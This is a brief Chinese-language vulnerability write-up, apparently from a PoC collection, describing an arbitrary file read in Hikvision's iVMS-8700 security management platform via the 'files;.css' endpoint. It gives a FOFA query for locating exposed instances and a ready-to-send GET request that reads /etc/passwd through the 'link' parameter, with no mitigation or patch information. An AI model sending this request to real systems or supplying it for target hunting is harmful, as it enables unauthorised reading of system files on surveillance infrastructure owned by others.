产品简介
海康威视综合安防是采用基于综合管理平台(iVMS-8700)的统一管理方案,融合网络高清、行为分析、人脸识别、车牌识别以及数据挖掘等技术,并结合综合体业务需求提供多种业务对接模式,最终实现资源的统一管理,提高管理效率。
漏洞简介
Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞
影响版本:海康威视集成化综合管理软件平台
复现环境
fofa查询语句:
body="/portal/skin/isee/redblack/"
漏洞复现
漏洞链接:https://127.0.0.1/lm/api/files;.css?link=/etc/passwd
Poc
GET /lm/api/files;.css?link=/etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36